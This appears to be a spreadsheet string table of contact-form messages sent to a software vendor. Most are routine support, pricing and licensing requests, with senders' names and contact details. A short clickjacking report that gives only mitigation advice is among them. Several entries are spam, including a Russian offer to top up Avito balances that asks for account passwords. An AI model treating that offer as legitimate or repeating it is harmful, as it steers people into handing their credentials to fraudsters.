    <t xml:space="preserve">Good Day, _x000D_
My name is Alex and I am with a company called Accurate Background, located in the United States. I am looking to do an employment  reference on a former employee with your company. Any information for your records department or exams team would be greatly appreciated as well. Thank you kindly.   _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have just completed an online interview with yourselves. Unfortunately, the device I was using stopped working, so I had to close it. When I opened it back up I thought as I hadn't submitted that video it would let me view it/do it again, but it didn't, it had already been submitted. I completed the rest of the interview, but was wondering if I could do it again, as the first video was not finished and I didn't get to answer the question properly. So it doesn't show who I really am. _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hi._x000D_
I want to acces the knowledge base to do some research. I am quite sure our company has acces to My Support but cant find the info you ask for or an admin log in for this use. The problem is that I am temping for the woman responsible for eDOCS DM management and I was wondering if you could help me with this_x000D_
_x000D_
Sincerly yours_x000D_
_x000D_
Christine Berg Olsen </t>
  </si>
  <si>
    <t>Dear Open Text_x000D_
When can heve this manual  Conten Server ?_x000D_
Greeting!</t>
  </si>
  <si>
    <t>We are interested in moving our fax services to the cloud in order to increase our uptime and disaster resiliency. do you have such an offering that integrates with office365?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello,_x000D_
_x000D_
TVG is leading software Distribution Company in Baltic's, located in Riga, Latvia, covering widest range of software products (Adobe, Microsoft, MCafee, Kaspersky, etc.)._x000D_
We have some interest from our customer about following product:_x000D_
Gupta Report Builder 6.3-1 license_x000D_
_x000D_
Could you, please, suggest the best way how to purchase it and what would be the price? Do you offer any discounts for resale this product?_x000D_
</t>
  </si>
  <si>
    <t>Need support on Right Fax  version10.6.2.1110.  Trying to do a database purge.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
am 22.09.2017 erhielten wir Ihre Zahlungen in Höhe von 156,17€ auf unserem Bankkonto. Leider war es uns bisher nicht möglich, diese Zahlung erfolgreich einer oder mehreren Forderungen zuzuordnen. _x000D_
Ich bitte Sie daher um die kurzfristige Zusendung einer Aufstellung über die auszugleichenden Posten per E-Mail._x000D_
_x000D_
Bitte senden Sie das Avis an zahlungsavise@sixt.com._x000D_
_x000D_
Vielen Dank im Voraus._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
 _x000D_
_x000D_
Jan Karl Kemmer_x000D_
Junior Agent Accounts Receivable_x000D_
_x000D_
E-Mail: jan-karl.kemmer@sixt.com_x000D_
Tel.: +49 (0) 381 8070 – 2978_x000D_
_x000D_
_x000D_
Sixt GmbH &amp; Co. Autovermietung KG ∙ Grubenstraße 27 ∙ 18055 Rostock_x000D_
Sitz der Gesellschaft: Pullach, Landkreis München_x000D_
Handelsregister beim Amtsgericht München: HRA 81 061_x000D_
Persönlich haftende Gesellschafterin: Sixt Verwaltung-GmbH_x000D_
Sitz der persönlich haftenden Gesellschafterin: Taufkirchen, Landkreis München_x000D_
Handelsregister beim Amtsgericht München: HRB 145 636_x000D_
Geschäftsführer: Erich Sixt, Detlev Pätsch, Dr. Julian zu Putlitz, Alexander Sixt, Konstantin Sixt_x000D_
_x000D_
 _x000D_
 _x000D_
 _x000D_
IMPRINT: Sixt GmbH &amp; Co. Autovermietung KG, Zugspitzstraße 1, 82049 Pullach, Value added tax identification number DE223999470, Register entry Munich Local Court: HRA 81 061, Personally liable partner: Sixt Verwaltungs-GmbH, Seat of the personally liable partner: Taufkirchen, Landkreis München, Managing directors: Erich Sixt, Julian zu Putlitz, Detlev Pätsch, Alexander Sixt, Konstantin Sixt. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Would like to confirm which regions cloud data is hosted in</t>
  </si>
  <si>
    <t>Hello,_x000D_
we would like replace our old fax system by a  cloud fax solution._x000D_
we use 16 phone line to manage ±15.000 fax (±22.500 pages)/month most of them are out going messages. we don't want any hardware anymore._x000D_
Can you provide us a solution,_x000D_
Pierre Limage</t>
  </si>
  <si>
    <t xml:space="preserve">Entschuldigen Sie die wiederholte Anfrage. Leider war die Email Adresse bisher falsch hinterlegt._x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
zum 31. Oktober 2017 wird es einen Betriebsübergang von der AREVA GmbH zur New NP GmbH geben. Mit diesem Betriebsübergang werden alle Aktivitäten der AREVA GmbH, inklusive aller dafür notwendigen Betriebsmittel und Mitarbeiter, auf die New NP GmbH übertragen. Die COMPAREX AG betreut die AREVA GmbH im Zuge dieses Betriebsüberganges bei der Übertragung aller Software-Lizenzen und -Verträge. Nähere Infos zu dieser Betriebsübertragung kann ich Ihnen gerne, wenn nötig, im Nachgang zukommen lassen. _x000D_
_x000D_
Bei der Prüfung des zu übertragenden Software-Lizenzbestandes der AREVA GmbH haben wir auch Softwareprodukte aus Ihrem Haus identifizieren können. Deshalb bitten wir Sie als Geschäftspartner der AREVA GmbH um Unterstützung bei der Übertragung Ihrer Software-Lizenzen von der AREVA GmbH zur New NP GmbH._x000D_
_x000D_
Hierzu benötigen wir bitte folgende Informationen:_x000D_
_x000D_
•	Ist die Übertragung Ihrer Software-Lizenzen und -Verträge erlaubt, auch wenn es keinerlei Beteiligungsverhältnisse zwischen beiden Unternehmen geben wird?_x000D_
•	Wie gestaltet sich der Prozess der Lizenzübertragung? Gibt es gegebenenfalls Lizenzübertragungs-Dokumente oder Vorlagen, die Sie uns bereitstellen können?_x000D_
- Es geht hier um Lizenzen vom Hersteller Hummingbird, dessen Verantwortlichkeit nach meinem Wissen nun bei Ihnen liegt._x000D_
_x000D_
_x000D_
Der nächste Schritt bei der Lizenzübertragung wäre nun die Identifizierung der zu übertragenden Lizenzen. Besteht die Möglichkeit, dass Sie uns einen Purchase Report/ eine Kaufstatistik zur Verfügung stellen können? Dieser sollte im besten Fall alle Beschaffungen, die die AREVA GmbH bei Ihnen getätigt hat, abbilden. Alternativ würde es auch ausreichen, wenn Sie uns die Lizenznachweise in Form von Rechnungsnachweisen oder Bestellbestätigungen schicken könnten._x000D_
_x000D_
Ich bedanke mich im Voraus für Ihre Bemühungen und verbleibe _x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
für einen Kunden von uns, suchen wir nach einer Lösung für Datei bzw. Dokumentenmanagamentsystem._x000D_
_x000D_
Hier Ergebnis sich gleich mehrere Fragen._x000D_
_x000D_
Bieten Sie eine Standalone Lösung an, unabhängig von zusätzlicher Lösungen wie SAP, die nicht nur Rechnungen oder gescannte Dokumente verwaltet sondern darüber hinaus auch Bilddaten oder jegliche Dateiformate verwalten kann?_x000D_
_x000D_
Gibt es einen Fragenkatalog Ihrerseits, den man dem Kunden an die Hand geben kann, um das geignete Produkt für Ihn zu finden?_x000D_
_x000D_
Vielen Dank und Freundliche Grüße_x000D_
Marco Köhler</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
zum 31. Oktober 2017 wird es einen Betriebsübergang von der AREVA GmbH zur New NP GmbH geben. Mit diesem Betriebsübergang werden alle Aktivitäten der AREVA GmbH, inklusive aller dafür notwendigen Betriebsmittel und Mitarbeiter, auf die New NP GmbH übertragen. Die COMPAREX AG betreut die AREVA GmbH im Zuge dieses Betriebsüberganges bei der Übertragung aller Software-Lizenzen und -Verträge. Nähere Infos zu dieser Betriebsübertragung kann ich Ihnen gerne wenn nötig im Nachgang per Email zukommen lassen._x000D_
_x000D_
Bei der Prüfung des zu übertragenden Software-Lizenzbestandes der AREVA GmbH haben wir auch Softwareprodukte aus Ihrem Haus identifizieren können. Deshalb bitten wir Sie als Geschäftspartner der AREVA GmbH um Unterstützung bei der Übertragung Ihrer Software-Lizenzen von der AREVA GmbH zur New NP GmbH._x000D_
_x000D_
Hierzu benötigen wir bitte folgende Informationen:_x000D_
_x000D_
•	Ist die Übertragung Ihrer Software-Lizenzen und -Verträge erlaubt, auch wenn es keinerlei Beteiligungsverhältnisse zwischen beiden Unternehmen geben wird?_x000D_
•	Wie gestaltet sich der Prozess der Lizenzübertragung? Gibt es gegebenenfalls Lizenzübertragungs-Dokumente oder Vorlagen, die Sie uns bereitstellen können?_x000D_
_x000D_
_x000D_
Der nächste Schritt bei der Lizenzübertragung wäre nun die Identifizierung der zu übertragenden Lizenzen. Besteht die Möglichkeit, dass Sie uns einen Purchase Report/ eine Kaufstatistik zur Verfügung stellen können? Dieser sollte im besten Fall alle Beschaffungen, die die AREVA GmbH bei Ihnen getätigt hat, abbilden. Alternativ würde es auch ausreichen, wenn Sie uns die Lizenznachweise in Form von Rechnungsnachweisen oder Bestellbestätigungen schicken könnten._x000D_
_x000D_
Ich bedanke mich im Voraus für Ihre Bemühungen und verbleibe _x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Patrick Hottenrott_x000D_
Consultant Software Asset Management_x000D_
_________________________________________________________________x000D_
_x000D_
COMPAREX AG_x000D_
Headquarters Leipzig_x000D_
Blochstraße 1_x000D_
D-04329 Leipzig_x000D_
Telefon:  +49 341 2568 </t>
  </si>
  <si>
    <t xml:space="preserve">iphone 5s восстановленный купить _x000D_
 _x000D_
&lt;a href=http://ref-store24.ru&gt;iphone 5s 16gb восстановленный&lt;/a&gt;_x000D_
&lt;a href=http://ref-store24.ru&gt;apple iphone 7 plus восстановленный&lt;/a&gt;_x000D_
 _x000D_
[url=http://ref-store24.ru]iphone 6 s plus восстановленный[/url]_x000D_
[url=http://ref-store24.ru]iphone 5s восстановленный[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
This Ticker is raised for our client Nokia Finland Oy._x000D_
_x000D_
We are planning upgrade Documentum Content Server version to 7.3._x000D_
_x000D_
Could you please provide the primary support and extended support date for version 7.3._x000D_
_x000D_
Also please provide us documentum content server installation guide for version 7.3._x000D_
_x000D_
It would be grateful if sales team contact me regarding upgrade._x000D_
_x000D_
_x000D_
Thanks &amp; regards,_x000D_
Nikhil Parkar_x000D_
</t>
  </si>
  <si>
    <t>4-0140 OpenText Content Server IDE (CSIDE) Fundamentals v16</t>
  </si>
  <si>
    <t>Currently we are using Open text 15 version, and our IT security team found this version is under vulnerability, and need to remove or upgrade it. May i know how to upgrade it to latest version?</t>
  </si>
  <si>
    <t>Informationen über Exceed benötigt. Was ist der Unterschied der einzelnen Produkte. Wir haben aktuell Version 14; was ist die aktuelle Version?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
gerne möchten wir opentext in Rahmen unserer Evaluierung "DAM / MAM / DMS" einbeziehen._x000D_
Wir, die RedTecLab GmbH sind eine 100%ige Tochter der Shop-Apotheke.com und verantwortlich für die Evaluierung und anschließende Vendor Selection._x000D_
_x000D_
Würden Sie uns diesbezüglich bitte einen Ansprechpartner für ein erstes allgemeines Telefonat nennen?_x000D_
Am besten erreichen Sie mich aktuell über meine E-Mail-Adresse: dominik.wollenschein@redteclab.com_x000D_
_x000D_
Den Termin für das Telefonat würde wir dann mit dem gennanten Ansprechpartner per E-Mail abstimmen._x000D_
Ein Fragebogen (RFI) liegt bereits vor und würde im Zuge des Telefontes besprochen und geteilt werden._x000D_
_x000D_
_x000D_
Beste Grüße,_x000D_
_x000D_
Dominik Wollenschein</t>
  </si>
  <si>
    <t>Would like to request for quotation for Documentum document management system</t>
  </si>
  <si>
    <t>If we use SAP Document presentment by Open Text with S/4Hana and for Billing in Utilities, then what would be the Technical Architecture and Diagram. Is there any hardware requirement for Open Text or is it just an add-on installation on the existing SAP System...</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in standartized content of appliances in Russian language. </t>
  </si>
  <si>
    <t xml:space="preserve">Product Query - is automated email attachment scanning part of </t>
  </si>
  <si>
    <t>To open account for My Support</t>
  </si>
  <si>
    <t>До недавнего времени лечение в Германии для многих являлось несбыточной мечтой. Многие больные люди даже не задумывались над такими возможностями. Всех пугал один вопрос – «очень дорого». И при этом, мало кто представлял реальные стоимости обследования и лечения в лучших медицинских центрах Германии. Помимо всего этого, пугают чисто организационные вопросы: куда обратиться за консультацией, кто будет помогать с переводом, как получить медицинскую визу. Как потом купить лекарства в аптеке, да и вообще... Вообщем организационные вопросы пугали не меньше чем вопросы стоимости. _x000D_
 _x000D_
Именно для решения всех медицинских и сопутствующих организационных вопросов более 10 лет назад была создана компания «Clinical Solutions». Наша компания была тоже создана не на пустом месте. За 4 года до этого, президентом «Клиники Нюрнберг», где я к тому времени 11 лет работал хирургом, мне было предложено создать и возглавить международный отдел. _x000D_
 _x000D_
У многих может возникнуть вопрос? Почему иностранные пациенты интересны клиникам Германии? _x000D_
 _x000D_
Любая клиника Германии заинтересована в притоке иностранных пациентов, т.к. это внебюджетное финансирование из страховых касс. Но при этом никакая клиника не имеет средств на маркетинг, на содержание транспорта, переводчиков и т.д. Откуда же брались эти деньги, если мой отдел тратил примерно от 80 до 100 тыс. евро в год только на маркетинг. Из маркетингового бюджета финансировались все рекламные акции, участие в выставках, полиграфия, интернет, несколько автомобилей, обслуживающих пациентов. _x000D_
 _x000D_
Поэтому в 2007 году мы приняли решение создать собственную компанию. Поводом для этого послужило и то, что мы поняли, что пациентам нужны абсолютно понятные и прозрачные счета за каждую медицинскую и сервисную услугу. _x000D_
 _x000D_
За эти годы мы создали в компании „Clinical Solutions - [url=http://www.clinical-solutions.ru/]www.clinical-solutions.ru[/url]“ специальную службу опеки. _x000D_
 _x000D_
Чем же занимается «служба опеки»? В первую очередь это переводы всех медицинс</t>
  </si>
  <si>
    <t>I am lonely at night and holidays</t>
  </si>
  <si>
    <t>Lonely</t>
  </si>
  <si>
    <t>Fax Document Reference #: 0541000173058639511_x000D_
_x000D_
Can you please confirm all attachments in the email (i had more than one) made it to the destination fax</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
I am Mohammed Israil,17 found some security issue which are not very critical but can affect the system/service in future. So without delaying. I am reporting this issue._x000D_
Hope you'll understand._x000D_
_x000D_
Vulnerability Type: Clickjacking (user-interface or UI redressing and IFRAME overlay) _x000D_
_x000D_
Affected URL:- https://blogs.opentext.com/_x000D_
_x000D_
Description: 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_x000D_
_x000D_
Reason: X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks._x000D_
_x000D_
Evidence: I attached a screenshot as well, Please check that._x000D_
_x000D_
Solution: There are two main ways to prevent clickjacking:_x000D_
_x000D_
    Sending the proper X-Frame-Options HTTP response headers that instruct the browser to not allow framing from other domains_x000D_
    Employing defensive code in the UI to ensure that the current frame is the most top level window_x000D_
_x000D_
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. ALLOW-FROM allows specific websites to frame the web page in supported web browsers)._x000D_
_x000D_
Reference: http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx_x000D_
_x000D_
Please let me know if you need additional info or help._x000D_
_x000D_
_x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>We have the EasyLink Integrated Messaging Desktop and I am trying to gain access to software and support</t>
  </si>
  <si>
    <t>As an ex-employee, I need the HR department to contact about continuing my COBRA coverage into Cal-COBRA as soon as possible.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a client in Houston that is looking for a proposal for a document management solution. _x000D_
They are in the Oil and Gas Industry </t>
  </si>
  <si>
    <t>Hello we are interested in becoming your supplier for all of your maintenance and construction needs across Canada and globally, can you please tell me the process for this and also can you tell me the person to contact including their name, email address, and phone number, thank you very much, have a wonderful day!</t>
  </si>
  <si>
    <t>Does the integration center support integration with FileNEt repository ? Can OpenText support Federated RM - FileNEt being the other repository ?</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;i&gt;Get Rid ofaCtDogUrineSmellsand Stains  Chm-Dry Your browser indicates if you've visited this  Your browser indicates if you've visited this link Professional Strength Stain &amp; Odor Eliminatlr - Enzyme-Powered Pet Odor &amp; Stain Remover for Dogs andCatUrine- Spot Carpet Cleaner - Small Animal Odor Remmover (32 oz)   More results.&lt;br&gt; Could be a lot of thibgs. My 13 yr old very overweight guy does this before he vomits. I joke he has an eating disorder since he's been insatiable since he  10 ReasonsCatsMeow- Petfinder Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
 [url=http://9percesleso0g.soup.io/]Ultrasonic cat[/url] [url=http://fullucal-buo2.soup.io/]Cat ailments old age[/url]  _x000D_
 If your cat pees on the bed, understand that it's her way of sending you a text message saying something is wrong. She might be sick or stressed, or maybe  Does My Cat Pe on the Bed or My Clothing?  Metaphorical  Jun 2017 ... Despite what you may think, your cat is not peeing on your bed out of spite or revenge. Work with your vet to figure out why your cat is  to Stop a Cat from Urinating on Beds - Pets&lt;/i&gt;.&lt;br&gt; &lt;u&gt;How to Get Rid of Cat Spray Smell  Cuteness&lt;/u&gt;.&lt;br&gt;  _x000D_
cat litter tracking _x000D_
 _x000D_
 This is DeeDee, mygreyhound , running through some of herobediencetricks. DeeDee is a retired racer  (Greyhound) Boot Camp Trining Video - &lt;/h2&gt;.&lt;br&gt; Acrylicspraypaint Etsy our browser indicates if you've visited this link Shop foracrylicspraypainton Etsy, the place to express your creativity through the buying and selling of handmade and vintage goods.  /search?q=acrylic+spray+paint More results.&lt;br&gt;  _x000D_
  [url=http://3cludinguzeti.soup.io/]Mattress cleaner spray[/url] [url=http://tiodifnisapf.soup.io/]Do cats scratch furniture[/url]  _x000D_
 If you notice astrongsmelltoyoururine , your first thought may be that something is wrlng. If you are a typically healthy adult, however,  -smellingUrineNot NecessarilyCausefor Concern ... oYur browser indicates if you've visited this link&lt;/h3&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Krystal Roxas and I am a Compliance Specialist at Theravance Biopharma._x000D_
_x000D_
I am going to be sending a Vendor Questionnaire. I am requesting for a contact name/email/phone number to send the questionnaire to, as I currently do not have one on file._x000D_
_x000D_
Best,_x000D_
Krystal Roxas_x000D_
</t>
  </si>
  <si>
    <t>On Oct 19 we received notice that system maintenance would be performed with intermittent service interruption. Ref #5732. Is this still the plan?</t>
  </si>
  <si>
    <t>I'm interested in the on demand training offering. Before signing up, can you provide me with a list of courses that is included in this subscription?</t>
  </si>
  <si>
    <t>Feature question regarding retention management. Is there a way to manage electronic documents that reside out of the OpenText system? We have 60+ technologies hosting operational data and documents, many of which cannot be consolidated into a central system. We are wondering whether OpenText, maybe with certain extensions, can serve as a retention management system for these sources, and delegate actual document deletion action to our custom web services, which would interface with the 60+ data sources. Data sources include PeopleSoft, ImageNow, file systems, SAP, email, and many others (I understand that OpenText has native integrations with some of these, but we are more interested in the cases where documents cannot be moved into OpenText). Thanks!</t>
  </si>
  <si>
    <t>Project to implementing an ECM System with Electronic Forms and BPM.</t>
  </si>
  <si>
    <t>Hello,  It appears I cannot access mySupport link and should be registered to the following support id 0012232818.  Can you please look into this issue?_x000D_
_x000D_
Thank you,_x000D_
Brendon Sterling</t>
  </si>
  <si>
    <t xml:space="preserve">Hi - I used to support this product years ago and am now supporting it again.  My account was still active as I was able to log in to your website and it recognized me.  I am now trying to get into the Support site and it seems that I'm in a loop and can't get past the login screen.  Thanks Tina_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for solution for UPC catalog and EDI for my apparel company. </t>
  </si>
  <si>
    <t>Hello_x000D_
We are currently in the process of exploring document management software and are interested in previewing a demo of DM products you offer to law firms._x000D_
_x000D_
Thank you_x000D_
Kasia</t>
  </si>
  <si>
    <t>I am trying to log in and start using the Open Text Program. I am unable to log in._x000D_
Please call me at 215-443-4107 so that I can start this program for our files.</t>
  </si>
  <si>
    <t>I cannot reset my OT password - i get the message 'update failed'.</t>
  </si>
  <si>
    <t>Need info and/or Demo of Auto classification and its capabilities. Also need information on federated RM and how it works with OpenText suite.</t>
  </si>
  <si>
    <t xml:space="preserve">Demo of assest management platform. </t>
  </si>
  <si>
    <t>Hi, we are looking at potential solutions to assist with AP invoice scanning into SAP. Would it be possible to get any literature on your product and to arrange a demo at some point? Thank you, Ben</t>
  </si>
  <si>
    <t>I need to schedule a call/demo with you please. We'd like to understand the options &amp; costs of your product as we are expanding our services and need a better fax solution. Some options that work on our side: _x000D_
Monday, 11/6_x000D_
-	10:15 – 11:15_x000D_
-	12:30 – 1:30_x000D_
Wednesday, 11/7_x000D_
-	1-2_x000D_
Thursday, 11/9_x000D_
-	12-2_x000D_
Friday, 11/10_x000D_
-	9-11_x000D_
-	12-1:30</t>
  </si>
  <si>
    <t>I'd like to find out if it's possible to get copies of OpenText software for internal testing purposes with our software. We have a number of products that route documents into things like Livelink, ApplicationXtender, Documentum, etc. In our support group we often need to attempt issue reproduction against these products for our own software.</t>
  </si>
  <si>
    <t>As a customer I'm trying to gain access to your support system so I can do research.  Please provide access.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
 _x000D_
_x000D_
I am reaching out from TenderScout in relation to a tender released by the The British Library for the provision of Enterprise Content Management (ECM) solution._x000D_
I would like to have a chat to see if this opportunity is in line with your desired business, and discuss the best practice approach for competing for the tender._x000D_
_x000D_
This contract is one of several open public opportunities that I'd like to chat to you about, are you available for a call this week?_x000D_
_x000D_
 _x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
We would like to add Easylink as our VAN for EDI data transmission. Please contact us for further clarification.</t>
  </si>
  <si>
    <t>Electronic information management system</t>
  </si>
  <si>
    <t>Would like quote on eDocs for a sole practitioner attorney.</t>
  </si>
  <si>
    <t>Hello, we have requested My Support access for Documentum product we are having subscription but we are still not able to get it and therefore can't download necessary software components. Our EMC-DELL customer no was: 10175259_x000D_
Thanks</t>
  </si>
  <si>
    <t>please remove my house phone number +97137622770 from your fax system 18003969402_x000D_
 because it is disturbing me.The last call I receive from the fax mentioned was at 13:45 pm UAE time.</t>
  </si>
  <si>
    <t>Issues with account</t>
  </si>
  <si>
    <t>Upgrade options and Admin password recovery for Live Link</t>
  </si>
  <si>
    <t>Recieved email asking me to change password and will not accept details of new password</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam,_x000D_
Greetings from Frost &amp; Sullivan! Could I check if there are any speaking slots available? We have strong speakers and content in this area and would be glad to propose topics that would be of great interest to your audience. Please let me know. _x000D_
_x000D_
Best_x000D_
Melissa_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am writing to you in order to know the pricing for OpenText Media Management Enterprise DAM solution. We would be needing it for around 400 GB of data with a user base of 40 people for at least next 2 years._x000D_
Kindly revert asap with the pricing and let me know in case you need any other information._x000D_
_x000D_
Thank you_x000D_
Karamveer Kaur_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Trying to register for support however your website is not working and the confirm email does not me allow to register a support request._x000D_
_x000D_
We are receiving errors for our OpenText product and need support ASAP._x000D_
_x000D_
Thanks._x000D_
_x000D_
James Owen - Computer Operator</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to access My Support and be able to access our tickets and knowledge base.  Have been having this issue for almost a month.  Keep going in circles as it keeps wanting to verify by email._x000D_
Registration Confirmation_x000D_
Dear John Tamietti, _x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
•	Your User ID: johnt@townpump.com_x000D_
•	Welcome and FAQ: http://www.opentext.com/support/get-support_x000D_
Thank you for registering with OpenText. To complete your registration, please verify your email address by selecting the confirmation link: _x000D_
Confirm Registration _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[b]Пополение баланса Авито (Avito) за 50%[/b] | [b]Телеграмм @a1garant[/b] _x000D_
 _x000D_
[b]Приветствую вас, дорогие друзья![/b] _x000D_
 _x000D_
Рады будем предоставить Всем вам услуги по пополнению баланса на действующие активные аккаунты Avito (а также, совершенно новые). Если Вам надо  определенные балансы - пишите, будем решать. Потратить можно  на турбо продажи, любые платные услуги Авито (Avito). _x000D_
 _x000D_
[b]Аккаунты не Брут. Живут долго.[/b] _x000D_
 _x000D_
Процент пополнения в нашу сторону и стоимость готовых аккаунтов: [b]50% от баланса на аккаунте.[/b] _x000D_
Если требуется залив на ваш аккаунт, в этом случае требуются логин и пароль Вашего акка для доступа к форме оплаты, пополнения баланса. _x000D_
Для постоянных клиентов гибкая система бонусов и скидок! _x000D_
 _x000D_
[b]Гарантия: [/b] _x000D_
 _x000D_
[b]И, конечно же ничто не укрепляет доверие, как - Постоплата!!![/b] Вперед денег не просим... _x000D_
 _x000D_
Рады сотрудничеству! _x000D_
 _x000D_
[b]Заливы на балансы Авито[/b] _x000D_
________ _x000D_
 _x000D_
аккаунт от авито украли_x000D_
как удалить номер с заблокированного аккаунта авито_x000D_
перевести деньги с авито кошелька на другой аккаунт_x000D_
как отвязать номер телефона от старого аккаунта на авито_x000D_
авито аккаунты в варфейс_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Our Contractor, Deloitte, specified that we are using OpenText Exstream to generate our forms and we need more in depth knowledge than our recent knowledge transfer provided. I would like a quote emailed to me for training of 4-6 person onsite at our Salem, Oregon offices. _x000D_
_x000D_
Thank you, Janet </t>
  </si>
  <si>
    <t>I want a quote for OpenText "RightFax" solution - also, is there an SDK available for this product? Also, how many lines - is there an option for 8?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested to acquire an Opt-In Email List of “Scientists, Chemists, Biologists, Pharmacologist, Clinicians, Laboratory Managers/Directors/Technicians, Biophysicst, Microbiologist, Pathologists, Toxicology, R&amp;D Mangers/Directors, Physicians, Health/Safety etc.,” from your target region?_x000D_
_x000D_
To name few sectors: Pharmaceutical, Biotechnology &amp; Life Sciences, New Drugs &amp; Development,  Chemicals &amp; Reagents, Clinical Diagnostics, Diagnostics, Research &amp; Development, Environmental Sciences, Forensics &amp; Security, Laboratory Technology etc.,_x000D_
_x000D_
Our data is up-to-date, relevant and accurate. Should you be targeting any specific list? Please fill the below and let me know your target audience, I will get back to you with the counts and pricing details._x000D_
_x000D_
Target industry: ___?___; Titles: ___?___; Geography: ___?___;_x000D_
_x000D_
Look forward to work with you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bert Connell</t>
  </si>
  <si>
    <t>Further information on the eDOCS Integration Solution.</t>
  </si>
  <si>
    <t>We would like to get more info on upgrading our current RightFax service and moving it to the cloud.</t>
  </si>
  <si>
    <t>How do I update my partner directory listing?  https://www.opentext.com/what-we-do/partners-and-alliances/partner-directory/partner-directory-detail?id=001D000001wDtKvIAK</t>
  </si>
  <si>
    <t xml:space="preserve">I am being charged 39.99 by mediabin.com on my debit card.  I do not know what this charge is for and I didn't authorize it.  </t>
  </si>
  <si>
    <t xml:space="preserve">Qfinity Monitoring Software- Pricing and compatibility with Mitel. </t>
  </si>
  <si>
    <t>I need for someone to contact me in regard to invoice 9000167911. This invoice will not be process in till it gets corrected. Customer ID 10413201</t>
  </si>
  <si>
    <t>Olá, boa tarde! _x000D_
Temos interesse em marcar um bate-papo com vocês._x000D_
Tem disponibilidade para virem a Natura falarem das soluções que vocês tem?_x000D_
Obrigada</t>
  </si>
  <si>
    <t>We would like to download version 16.2 of eDocs Document Management System to test with our product.  What is the cost for a license?  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I am in the process of researching several tools and service providers for our discovery and preservation process. We currently have use an in-house process, and are looking to replace this with a potential combination of software and service provider for the various requests we receive. I have selected your organization for additional questions, in order to verify your product/service meets our needs.   _x000D_
_x000D_
Please contact me in order to discuss the following questions. _x000D_
•	I need to be able to estimate an approximate cost by product or service to ensure this is within our budget. _x000D_
•	How is security configured for your software or service, allowing for access to be limited to appropriate users, and elevated permissions are not granted to users. _x000D_
•	What flexibility is available for in-house, hosted, self-administered, or service provider. _x000D_
•	If in house what is the estimated foot print on the network._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Website is down http://htmlpreview.infograph.com/BravaSDK/HTML/samples/preview/preview.html_x000D_
</t>
  </si>
  <si>
    <t>Hi, we use the Gupta TD6.3 for our business applications. I want to know we I can_x000D_
find documentation (user guides and so on) about the developpement tool. Where can I_x000D_
download ?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Interested in communicating with Wim Smitt, CEO of MRDM. Just listened to his ICHOM presentation, and would like to communicate with him._x000D_
_x000D_
Christine A. Larson, Ph.D.</t>
  </si>
  <si>
    <t xml:space="preserve">Question about billing </t>
  </si>
  <si>
    <t xml:space="preserve">Greetings, we are planning a lift and shift to the cloud for a solution that includes MBPM and StreamServe. As part of the move I'm attempting to estimate the costs of the new environments, and so would like ballpark numbers for licensing the above. If the account manager could reach out that would be great. Note that the current licenses may have been issued to our partner EDM Group, I'm not sure. </t>
  </si>
  <si>
    <t>Would like to obtain access to your website; would like to be added onto your listing for notifications and updates; need link or instructions to obtain a current Vendor Guide.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je réalise pour Archimag un guide sur l'IA et je suis à la recherche de retour d'expérience et de témoignages clients sur le sujet. _x000D_
Accepteriez-vous un cour entretien téléphonique pour parler de l'IA et de ce qu'elle apporte à vos solutions ? Et si un client est disponible pour témoigner, je suis preneur._x000D_
_x000D_
Merci d'avance,</t>
  </si>
  <si>
    <t>Require Access to download RightFax 16.02. Also download latest patch. We are moving to new version of RightFax (due to our email system being upgraded to Exchange 2016) and require to download the latest version.</t>
  </si>
  <si>
    <t>Dear,_x000D_
_x000D_
